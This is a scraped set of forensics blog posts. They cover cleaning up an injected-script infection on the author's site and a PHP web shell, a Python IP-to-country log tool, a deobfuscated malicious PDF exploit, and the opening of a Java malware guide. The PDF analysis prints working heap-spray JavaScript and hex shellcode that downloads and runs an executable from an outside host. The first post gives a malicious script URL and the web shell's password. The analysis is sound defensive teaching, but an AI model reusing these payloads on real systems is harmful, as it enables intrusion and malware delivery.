Quantcast
Channel: Ghetto Forensics
Viewing all 52 articles
Browse latest View live

Analysis of Web-based Malware Attack

$
0
0
Due to the very nature that this is a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.

Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else.  I was sitting at my desk and quickly opened it to verify.  Sure enough, it was:

Malware infection shown to visitors


I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:
    <script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n
With the infection spotted, I checked the file's MAC times to see when the attack occurred:

    $ stat books.htm
    File: `books.htm'
    Size: 1500      Blocks: 8          IO Block: 4096   regular file
    Device: 811h/2065d Inode: 275324414   Links: 1
    Access: (0664/-rw-rw-r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2010-07-19 07:10:46.000000000 -0700
    Modify: 2011-04-02 23:35:38.000000000 -0700
    Change: 2011-04-02 23:35:38.000000000 -0700
Looking at the results of this file shows that the file was modified and changed on April 2nd at 11:35PM. This is just one file, so we need to compare against another file to verify the date and time. A quick spot check showed an additional HTM file with the infection:


    $ stat faq.htm
    File: `faq.htm'
    Size: 143       Blocks: 8          IO Block: 4096   regular file
    Device: 811h/2065d Inode: 275322846   Links: 1
    Access: (0644/-rw-r--r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2010-02-25 20:37:47.000000000 -0800
    Modify: 2011-04-02 23:35:38.000000000 -0700
    Change: 2011-04-02 23:35:38.000000000 -0700
A spot check across other folders showed similar infections. A grep for "globalpower" showed that it only infected .htm and .html files. I then ran the following script to search for the infection code and remove it.
    grep -Rl "globalpower" * | xargs sed -i 's|<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\\n||g'
In part: grep finds the infected files and passes the filename to sed. Sed then does a global find & replace (s/old/new/g). Since the search query uses a '/', I just used '|' for sed instead.  This basically looks for that infection code and replaces it with nothing, thus removing it.

Now that we have a known date and time, and assuming that this is not a stomped date, we can focus on the network logs to see what occurred during that time. When reviewing the Apache logs I found the following two lines that were the sole activity during that time.
    66.96.128.62 - - [02/Apr/2011:23:35:32 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 162 "-""-"
    66.96.128.62 - - [02/Apr/2011:23:35:37 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 433 "-""-"
These files show the offending IP address, verifies the date and time but, more importantly, shows the initial malware script that caused the problems.  It also shows two consecutive connections, five seconds apart. The first connection sent 162 bytes of data back to the attacker and the second sent 433 bytes. The file still existed on the system. I gathered the file inode data below and then renamed it and chmod'd it to 400 (r--------) to avoid any additional execution. At this point the date sunk in. February 24th? The timestamps could be stomped, or the file really could've been uploaded at that point. My access logs do not go that far back, but I have to assume the worst.
    $ stat aarika_friend.php
    File: `aarika_friend.php'
    Size: 28278     Blocks: 56         IO Block: 4096   regular file
    Device: 811h/2065d Inode: 113164428   Links: 1
    Access: (0644/-rw-r--r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2011-02-24 00:31:36.000000000 -0800
    Modify: 2011-02-24 00:31:36.000000000 -0800
    Change: 2011-02-24 00:31:36.000000000 -0800
This PHP file was encoded into an unreadable format that we'll touch on later. For now, the hole needs to be patched. I see the first big issue here is that the file exists within a folder called "/main/1.5.back/tmp". When I was doing some obscure testing over a year ago I set the tmp folder in my Joomla to 777 permissions. I then neglected to reset them back. Worst. Mistake. Ever. When I performed a major Joomla update on December 31, 2010, I copied the entire directory to a backup and created a new one. This wide open directory sat there for months. How did the file end up in that particular location? I don't know at this point. I change permissions on the folder for now. I also check all other folders to ensure that none were left open.
To see if any other files were accessed, I scan my folder tree to find any file modified and created within the last 90 days by running:
    $ find ./ -mtime 90
    $ find ./ -ctime 90
This search did not uncover any additional files.

It was an embarrassing hit, but I did eventually clean the system up. From point of notification to remediation was about 10 minutes. And at least I hold no PII on the server ;)

Malware analysis

For the time, I kept a copy of infected files. They were moved outside of the public web folder to a place where I can later analyze them. I focused on the aarika_friend.php. I copied the code to a VM environment running Linux. This file included the following data (some portions reduced for obvious reasons)

    <?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8bb1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b(""$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7
    ...
    CgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?
Looking at the low-ASCII structure of the data, and the trailing "==", it's easy to see this is Base64 encoded. I then removed the header up to the "JGs9..." and the tail after "==" and ran it through a Base64 decoder. It resulted in the following data (again, some portions removed)
    $k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;
    ...
    175;175;175;242;130;133;242;175;");$z=""; foreach($m as $v) if ($v!="") $z.=chr($v^$k); eval($z);
The explode() and chr() PHP functions here are the key. Notice the first variable is k=143. Explode() will take each 3-digit number (splitting on the semicolon) and XOR (^) the number by 143, then convert the result to an ASCII character (chr(number^143)). We can test this manually to test:

$ php -r 'echo(chr(234^143).chr(253^143).chr(253^143).chr(224^143).chr(253^143)."\n");'
error

Now we know that we're seeing appropriate ASCII text. The foreach() command goes through each 3-digit number, converts it to an ASCII character, and appends it to a master variable string called $z. At this point I'm going to edit the code to remove the very last command: eval($z);
Instead, I'll replace it with:
    $bb=fopen('malware.txt','w');fwrite($bb,$z);fclose($bb);
I then add the necessary PHP header and footer to the file: "<php " and "?>"
After making the edits I double check, then triple check, to ensure that I removed the eval() statement. Then I run:
    php -f aarika_friend.decoded.php
It creates a new output called 'malware.txt' which contains the raw code. Rather than display it here, I'll point you to a pastebin archive of the code.  Pastebin gives a safe environment to view the code while performing syntax highlighting to make it easier to read.
So let's analyze a bit of what's going on in this code.  By looking solely at the HTML sections we can see a basic web structure in place. The script creates three two boxes for Check (p) and cmd. The attacker types in their command into the cmd box and a verification phrase into the Check box.
Before executing the command the code first looks to see if the check phrase, stored as a variable named 'p', is correct.

  • if (md5($_COOKIE["p"]) !="ca3f717a5e53f4ce47b9062cfbfb2458") {


If the MD5 hash of the phrase matches the value above then the specified command executes. The verification value that matches that MD5? It's "showmustgoon!"

$ echo -n showmustgoon! | md5sum
ca3f717a5e53f4ce47b9062cfbfb2458  -

At this point, the rest is just an academic exercise. The exploit was found, the vulnerability was found, and all was remediated. It turned into a learning lesson for me and hopefully for you as well.


Geolocational Log Analysis: Think Globally, Act Locally

$
0
0

In many network environments the administrators and security engineers have an understanding of the full geographical scope and reach of their network. While some corporations have a global audience and expect traffic from the far reaches of the world, others are more localized and target a specific small region.

A health care provider for Alaska would monitor its network connections to ensure that network connections are limited to its main source of users, i.e. those in Alaska. An insurance company in St. Louis will see mostly traffic from IP addresses in Missouri, but Illinois as well, due to the city  being on the state line.

Occasionally, administrators may notice connections being made from Hawaii, Bermuda, or Italy, signifying users who are on vacation but are still wired in to their work. However, a long-term series of connections from a Eircom subscriber, Ireland’s largest ISP, should spark interest to the network administrator of a Seattle tax firm.

While anonymous web connections from global addresses are common, specific attention should be paid to such addresses being used to access password-protected areas of a corporation. This could include remote file access, VPN and web-based corporate email.

In such cases the logs from these applications, usually supplied in plain text or W3C format, contain details about transactions to include the remote IP address and the account name being authorized. In reviewing logs from various incident responses cmdLabs has found details to show that a short log review made on a daily basis could help smaller corporations determine quickly if a user account was compromised and accessed from a remote location.

For example, the log sample below from a Cisco ASA tracks VPN connections. The user “cmdLabs\bbaskin” was accessed via the IP address of 159.134.100.100 on 2 April, 2011, an IP that was traced back to Ireland. A few hours later the same account was accessed from an IP address in Austria.


Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-302013: Built outbound TCP connection 7823 for inside:10.10.10.50/389 (10.10.10.50/389) to NP Identity Ifc:192.168.1.1/1047 (192.168.1.1/1047)
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-1
04: AAA user authentication Successful : server =  10.10.10.50 : user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113009: AAA retrieved default group policy (DfltGrpPolicy) for user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113008: AAA transaction status ACCEPT : user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-734001: DAP: User cmdLabs\bbaskin, Addr 159.134.100.100, Connection Clientless: The following DAP records were selected for this connection: DfltAccessPolicy


For this small set of data it is trivial to query each IP address to determine its country of origin, netblock owner, and other details that would highlight unauthorized access. The problem arises when you have hundreds of thousands of such transactions in your daily log files.




One service that cmdLabs uses regularly is the IP to ASN WHOIS server run by Team Cymru. This server provides quick and easy access to country codes for a given IP address. However, it has two limitations: it requires Internet-access which is not readily available from a forensic workstation and to process a large bulk of IPs you have to use their Netcat process which only returns ASNs and not country codes. To overcome these limitations I've developed a simple solution that could process hundreds of thousands of IP addresses to determine country codes.

This solution is a small Python script called IP2CC that takes an IP address as input and outputs the originating country code for that IP. This solution requires three components:
  1. The free country code database located at http://www.maxmind.com/app/geolitecountry (updated monthly)
  2. Python API module to access this database located at https://github.com/appliedsec/pygeoip
  3. The ip2cc.py script. Downloadable at the end of this blog post.
The script allows for input to be given via the command line, stdin, or an input file. In normal use it will simply output the country code. With the –c or -t option the output will contain both the IP and country code in either a comma-separated version (CSV) or tab-separated (TSV) output, respectively.

    Python ip2cc.py –i <ip> -f <input file> [-c] [-t]

    > python ip2cc.py -i 11.11.11.11
    US
    > python ip2cc.py -i 22.22.22.22 -c
    22.22.22.22,US
    > echo 33.33.33.33 | python ip2cc.py
    US
    > python ip2cc.py -f IP.txt -c
    14.48.7.101,AU
    12.51.21.19,US
    10.61.14.9,Internal


In one use, we'll eliminate known intranet/extranet IP addresses and run the resulting list through IP2CC to produce a master list of foreign accesses. This script will run in Linux and OSX in conjunction with the native OS command line tools. For a Windows environment you will find additional capabilities by installing the necessary GnuWin32 components. For example, when reviewing a NCSA-formatted log with the IP address in the first field:
    D:\> type in051611.log | egrep –v “^192” | gawk “{print $1}” | python ip2cc.py -t | egrep –v “US|Internal” | gawk -F\t "{print $1}" | sort | uniq > DailyForeignIPs.txt
    D:\> for /F %i in (DailyForeignIPs.txt) do grep “%i” in051611.log >> DailyForeignConnections.txt
The first command above will save a simple text listing of all unique foreign IP addresses into a file for processing. The second line takes each IP address from that resulting file and compares it back against the logs to extract all lines that include its presence. The resulting DailyForeignConnections.txt can then be quickly reviewed to determine if any accounts were accessed from a foreign IP address.

Dealing with the VPN logs shown earlier, we'll change our command line a bit. Using the standard Cisco log file index as a source we can see that the log id of 734001 will show us the remote IP address of a user login. We'll search the log for that id and then parse out the IP address in the 15th field. An additional hindrance is that the IP address is appended with a comma, which we’ll remove with the ‘tr’ command.
    D:\> type asavpn-051611.log | findstr "734001" | gawk “$15 !~ /^192/ {print $15}” | tr -d "," | python ip2cc.py –t | egrep –v “US|Internal” | sort | uniq > DailyVPNForeignIPs.txt
This is ultimately just a very simple Python script. In-house, we use it as a mere function within larger processes, but its simplicity allows for it to be used in a variety of result-tuning processes. Customization is easy. At times I'll make an offshoot of the script to process input from `uniq` command with the `-c` count option occasionally. The `uniq –c` adds a new column that specifies the total number of instances of that IP address which is useful when evaluating the persistence of a single IP amongst thousands. A few small changes to the Python will allow you to read this count and add it to the CSV output for easy integration into a spreadsheet.

Usage of a tool like IP2CC is a first step to opening an administrators eyes to traffic beyond their network. A good administrator or security engineer should monitor not only the traffic that flows across their network but also the perceived traffic that flows from a network’s outer nodes to the Internet. Monitoring for your company’s existence in spam black-lists, a malware rating on services like Web of Trust, and other indicators can give clues that an infection or intrusion may be underway within your network.

Downloads:
IP2CC Python Source Code v1.0

Malicious PDF Analysis: Reverse code obfuscation

$
0
0
I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "& # 000119;" and ""& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, mathematical operators, like "& lt;" are escaped as HTML "<". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters. By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that reference each individual character, each separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with layer of obfuscation, a quick Python script makes short work of it:
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    result=""
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two bytes equals the hexadecimal value for the binary character. Copying and pasting the data into a hex editor can convert it to binary.

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straight forward. It's a simple downloader with the URL in plain text (Similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code following by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially instills a DLL into the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;1
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls I2() that makes a block of text that is "QUFB" 10,984 times.
_l10 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and those 10,984 "QUFB"'s? Those Base64 decode to "0x414141". That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.

Java Malware - Identification and Analysis

$
0
0

DIY Java Malware Analysis


Parts Required:AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another insurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience in Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple How-To blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process, this is basically mine, and it takes the approach of examining the initial downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:
  • Windows XP: %AppData%\Sun\Java\Deployment\Cache
  • Windows Vista/7/8: %AppData%\LocalLow\Sun\Java\Deployment\Cache
